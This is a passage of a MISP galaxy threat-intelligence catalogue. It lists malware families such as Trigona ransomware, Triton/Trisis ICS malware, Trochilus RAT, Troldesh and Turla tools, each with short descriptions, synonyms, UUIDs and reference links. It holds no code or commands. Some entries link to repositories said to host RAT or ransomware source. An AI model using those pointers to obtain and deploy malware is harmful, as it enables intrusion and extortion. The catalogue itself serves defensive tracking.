- https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest - webarchive
- https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth - webarchive
- https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes - webarchive
- https://www.youtube.com/watch?v=KMcSAlS9zGE - webarchive
- http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html - webarchive
- https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html - webarchive
- https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html - webarchive
- https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/ - webarchive
- https://thehackernews.com/2022/05/malware-analysis-trickbot.html - webarchive
- https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre - webarchive
- https://intel471.com/blog/privateloader-malware - webarchive
- https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/22/trickbot-fake-ips-part2.html - webarchive
- https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/ - webarchive
- https://www.deepinstinct.com/2019/07/12/trickbooster-trickbots-email-based-infection-module/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf - webarchive
- https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/ - webarchive
- https://www.cyberbit.com/latest-trickbot-variant-has-new-tricks-up-its-sleeve/ - webarchive
- https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident - webarchive
- https://therecord.media/trickbot-new-attacks-see-the-botnet-deploy-new-banking-module-new-ransomware/ - webarchive
- https://www.joesecurity.org/blog/498839998833561473 - webarchive
- https://www.youtube.com/watch?v=lTywPmZEU1A - webarchive
- https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/ - webarchive
- https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf - webarchive
- https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-110a - webarchive
- https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/ - webarchive
- https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/ - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/ - webarchive
- https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/ - webarchive
- https://www.justice.gov/opa/pr/multiple-foreign-nationals-charged-connection-trickbot-malware-and-conti-ransomware - webarchive
- https://www.gosecure.net/blog/2021/12/03/trickbot-leverages-zoom-work-from-home-interview-malspam-heavens-gate-and-spamhaus/ - webarchive
- https://research.checkpoint.com/2022/a-modern-ninja-evasive-trickbot-attacks-customers-of-60-high-profile-companies/ - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://www.secdata.com/the-trickbot-and-mikrotik/ - webarchive
- https://community.riskiq.com/article/298c9fc9 - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html - webarchive
- https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/ - webarchive
- https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
- https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/ - webarchive
- https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html - webarchive
- https://www.hhs.gov/sites/default/files/bazarloader.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker - webarchive
- https://www.infosecurity-magazine.com/blogs/trickbot-mikrotik-connection/ - webarchive
- https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056 - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf - webarchive
- https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor - webarchive
- https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez - webarchive
- https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/ - webarchive
- https://public.intel471.com/blog/partners-in-crime-north-koreans-and-elite-russian-speaking-cybercriminals/ - webarchive
- https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/ - webarchive
- https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2 - webarchive
- http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module - webarchive
- https://blog.vincss.net/2021/10/re025-trickbot-many-tricks.html - webarchive
- https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html - webarchive
- https://arcticwolf.com/resources/blog/karakurt-web - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf - webarchive
- https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/ - webarchive
- https://www.reuters.com/technology/details-another-big-ransomware-group-trickbot-leak-online-experts-say-2022-03-04/ - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf - webarchive
- https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/ - webarchive
- https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf - webarchive
- http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html - webarchive
- https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/ - webarchive
- https://blogs.microsoft.com/on-the-issues/2020/10/20/trickbot-ransomware-disruption-update/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-blackburn - webarchive
- https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html - webarchive
- https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes - webarchive
- https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization - webarchive
- https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf - webarchive
- https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/ - webarchive
- https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf - webarchive
- https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html - webarchive
- https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/ - webarchive
- https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/ - webarchive
- https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/ - webarchive
- https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/ - webarchive
- https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/ - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor - webarchive
- https://www.advanced-intel.com/post/trickbot-group-launches-test-module-alerting-on-fraud-activity - webarchive
- https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware - webarchive
- https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/ - webarchive
- https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/ - webarchive
- https://securityintelligence.com/posts/trickbot-survival-instinct-trickboot-version/ - webarchive
- https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns - webarchive
- https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf - webarchive
- https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/02/ESET_Threat_Report_Q42020.pdf - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx - webarchive
- https://blog.cyberint.com/ryuk-crypto-ransomware - webarchive
- https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/ - webarchive
- https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/ - webarchive
- https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx - webarchive
- https://www.ic3.gov/Media/News/2022/220120.pdf - webarchive
- https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/ - webarchive
- https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf - webarchive
- https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/ - webarchive
- https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf - webarchive
- https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/ - webarchive
- https://www.mandiant.com/media/12596/download - webarchive
- https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure - webarchive
- https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/ - webarchive
- https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/ - webarchive
- https://www.wired.com/story/trickbot-malware-group-internal-messages/ - webarchive
- https://www.govcert.ch/blog/37/trickbot-an-analysis-of-data-collected-from-the-botnet - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot - webarchive
- https://labs.bitdefender.com/2020/11/trickbot-is-dead-long-live-trickbot/ - webarchive
- https://unit42.paloaltonetworks.com/ryuk-ransomware/ - webarchive
- https://www.nisos.com/research/trickbot-trickleaks-data-analysis/ - webarchive
- https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/ - webarchive
- https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group - webarchive
- https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/ - webarchive
- https://osint.fans/service-nsw-russia-association - webarchive
- https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/ - webarchive
- https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf - webarchive
- https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/ - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- http://www.malware-traffic-analysis.net/2018/02/01/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://blog.vincss.net/re025-trickbot-many-tricks/ - webarchive
- https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/ - webarchive
- https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features - webarchive
- http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot - webarchive
- https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/ - webarchive
- https://public.intel471.com/blog/global-trickbot-disruption-operation-shows-promise/ - webarchive
- https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/ - webarchive
- https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/ - webarchive
- https://securelist.com/trickbot-module-descriptions/104603/ - webarchive
- https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/ - webarchive
- https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/ - webarchive
- https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html - webarchive
- https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89 - webarchive
- https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c - webarchive
- https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/ - webarchive
- https://share.vx-underground.org/Conti/ - webarchive
- https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html - webarchive
- https://home.treasury.gov/news/press-releases/jy1256 - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-076a - webarchive
- https://www.bleepingcomputer.com/news/security/trickbot-malware-mistakenly-warns-victims-that-they-are-infected/ - webarchive
- https://www.justice.gov/opa/press-release/file/1445241/download - webarchive
- https://www.europol.europa.eu/media-press/newsroom/news/largest-ever-operation-against-botnets-hits-dropper-malware-ecosystem - webarchive
- http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html - webarchive
- https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/ - webarchive
- https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607 - webarchive
- https://public.intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts/ - webarchive
- https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/ - webarchive
- https://www.intrinsec.com/deobfuscating-hunting-ostap/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf - webarchive
- https://cyber.wtf/2020/08/31/trickbot-rdpscandll-password-transof/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-ulrick - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Trigona
According to PCrisk, Trigona is ransomware that encrypts files and appends the "._locked" extension to filenames. Also, it drops the "how_to_decrypt.hta" file that opens a ransom note. An example of how Trigona renames files: it renames "1.jpg" to "1.jpg._locked", "2.png" to "2.png._locked", and so forth.
It embeds the encrypted decryption key, the campaign ID, and the victim ID in the encrypted files.
Internal MISP references
UUID d5e900b0-5a6d-4e29-ab64-fa72863198a1
which can be used as unique global reference for Trigona
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.trigona - webarchive
- https://resources.prodaft.com/wazawaka-report - webarchive
- https://www.fortinet.com/blog/threat-research/ransomware-roundup-trigona-ransomware - webarchive
- https://www.trendmicro.com/en_us/research/23/f/an-overview-of-the-trigona-ransomware.html - webarchive
- https://unit42.paloaltonetworks.com/trigona-ransomware-update/ - webarchive
- https://asec.ahnlab.com/en/61000/ - webarchive
- https://asec.ahnlab.com/en/51343/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Triton
Malware targeting Triconex Safety Instrumented System (SIS) controllers, which are commonly used in Industrial Control Systems (ICS).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Triton.
Known Synonyms |
---|
HatMan |
Trisis |
Internal MISP references
UUID 79606b2b-72f0-41e3-8116-1093c1f94b15
which can be used as unique global reference for Triton
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.triton - webarchive
- https://www.eenews.net/stories/1060123327/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html - webarchive
- https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors - webarchive
- https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20A%29_S508C.PDF - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-083a - webarchive
- https://dragos.com/blog/trisis/TRISIS-01.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html - webarchive
- https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf - webarchive
- https://www.ic3.gov/Media/News/2022/220325.pdf - webarchive
- https://home.treasury.gov/news/press-releases/sm1162 - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf - webarchive
- https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics - webarchive
- https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
- https://github.com/ICSrepo/TRISIS-TRITON-HATMAN - webarchive
- https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1538425180.pdf - webarchive
- https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security - webarchive
- https://www.nozominetworks.com//downloads/US/Nozomi-Networks-TRITON-The-First-SIS-Cyberattack.pdf - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-110a - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Trochilus RAT
Trochilus is a RAT written in C++ that is available on GitHub. GitHub repositories:
- https://github.com/m0n0ph1/malware-1/tree/master/Trochilus
- https://github.com/5loyd/trochilus
Internal MISP references
UUID 1c3ee140-8c47-4aa7-9723-334ccd886c4e
which can be used as unique global reference for Trochilus RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat - webarchive
- https://github.com/5loyd/trochilus/ - webarchive
- https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments - webarchive
- https://github.com/m0n0ph1/malware-1/tree/master/Trochilus - webarchive
- https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia - webarchive
- https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-vinewood - webarchive
- https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats - webarchive
- https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf - webarchive
- https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Troldesh
According to Malwarebytes, ransomware is a type of malware that prevents users from accessing their system or personal files and demands a ransom payment in order to regain access. Ransom.Troldesh is spread by malspam, typically in the form of attached .zip files. This ransomware sometimes uses a CMS on a compromised site to host downloads.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Troldesh.
Known Synonyms |
---|
Shade |
Internal MISP references
UUID 41acd50d-e602-41a9-85e7-c091fb4bc126
which can be used as unique global reference for Troldesh
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh - webarchive
- https://unit42.paloaltonetworks.com/shade-ransomware-hits-high-tech-wholesale-education-sectors-in-u-s-japan-india-thailand-canada/ - webarchive
- https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/ - webarchive
- https://blog.checkpoint.com/2015/06/01/troldesh-new-ransomware-from-russia/ - webarchive
- https://www.zdnet.com/article/shade-troldesh-ransomware-shuts-down-and-releases-all-decryption-keys/ - webarchive
- https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/ - webarchive
- https://blog.avast.com/ransomware-strain-troldesh-spikes - webarchive
- https://securelist.com/the-shade-encryptor-a-double-threat/72087/ - webarchive
- https://support.kaspersky.com/13059 - webarchive
- https://github.com/shade-team/keys - webarchive
- https://labs.bitdefender.com/2020/05/shade-troldesh-ransomware-decryption-tool/ - webarchive
- https://www.welivesecurity.com/2019/01/28/russia-hit-new-wave-ransomware-spam/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Troll Stealer
Internal MISP references
UUID 83052e07-0022-467a-a047-fb2fcec3a870
which can be used as unique global reference for Troll Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TroubleGrabber
Internal MISP references
UUID 183fa14a-f42a-4508-b146-8550ba1acf2a
which can be used as unique global reference for TroubleGrabber
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
troystealer
Internal MISP references
UUID 36d7dea1-6abf-41ea-bcd8-079f24dc0972
which can be used as unique global reference for troystealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Trump Ransom
Internal MISP references
UUID 48deadcc-1a67-442d-b181-fdaaa337c4bb
which can be used as unique global reference for Trump Ransom
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tsifiri
Internal MISP references
UUID 3da6f62c-9e06-4e7b-8852-7c7689f65833
which can be used as unique global reference for Tsifiri
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TUNNELFISH
Internal MISP references
UUID 561910ea-d165-48ea-9144-1c2d0cab3caa
which can be used as unique global reference for TUNNELFISH
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TunnelSpecter
Internal MISP references
UUID 339e7cba-5934-4fdb-8e98-739813927011
which can be used as unique global reference for TunnelSpecter
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tuoni
According to its GitHub repo, Tuoni is a sophisticated, cross-platform red teaming framework designed to enhance cybersecurity education and training through large-scale cyber defense exercises. Developed using Java for robustness, Docker for versatility, and featuring an intuitive web browser interface, it supports and streamlines cyber exercises. With its modular, extendable plugin system, Tuoni offers Red Teamers the flexibility to tailor its capabilities for specific educational and exercise needs. Its user-friendly interface facilitates easy operation and efficient reporting, essential in training environments. Tuoni embodies a commitment to power, adaptability, and collaboration, aimed at empowering Red Teamers with a tool that meets the dynamic demands of modern cyber defense education.
Internal MISP references
UUID b2721b97-cbe8-4883-803a-814525ff5cac
which can be used as unique global reference for Tuoni
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
turian
According to Mitre, Turian is a backdoor that has been used by BackdoorDiplomacy to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, Turian is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.
Internal MISP references
UUID 69585b58-ec98-4a70-b61d-288d5a7ca7c3
which can be used as unique global reference for turian
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.turian - webarchive
- https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/ - webarchive
- https://www.fortinet.com/blog/threat-research/analysis-of-follina-zero-day - webarchive
- https://unit42.paloaltonetworks.com/playful-taurus/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Turkojan
Internal MISP references
UUID 17f9e595-c7c2-448a-a48a-6079e4c5791a
which can be used as unique global reference for Turkojan
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TurlaRPC
Internal MISP references
UUID 8c6248d2-2b3a-4fe8-99cd-552077e3f84f
which can be used as unique global reference for TurlaRPC
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_rpc - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ - webarchive
- https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity - webarchive
- https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html - webarchive
- https://unit42.paloaltonetworks.com/ironnetinjector/ - webarchive
- https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Turla SilentMoon
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Turla SilentMoon.
Known Synonyms |
---|
BigBoss |
Cacao |
GoldenSky |
HyperStack |
Internal MISP references
UUID ddee7f00-66e0-4d89-bd51-4b0df516a248
which can be used as unique global reference for Turla SilentMoon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_silentmoon - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://twitter.com/Arkbird_SOLG/status/1304187749373800455 - webarchive
- https://www.emanueledelucia.net/the-bigboss-rules-something-about-one-of-the-uroburos-rpc-based-backdoors/ - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity - webarchive
- https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TURNEDUP
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TURNEDUP.
Known Synonyms |
---|
Notestuk |
Internal MISP references
UUID fab34d66-5668-460a-bc0f-250b9417cdbf
which can be used as unique global reference for TURNEDUP
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup - webarchive
- https://www.cyberbit.com/new-early-bird-code-injection-technique-discovered/ - webarchive
- https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/ - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage - webarchive
- https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage - webarchive
- https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TYPEFRAME
TYPEFRAME is a RAT.
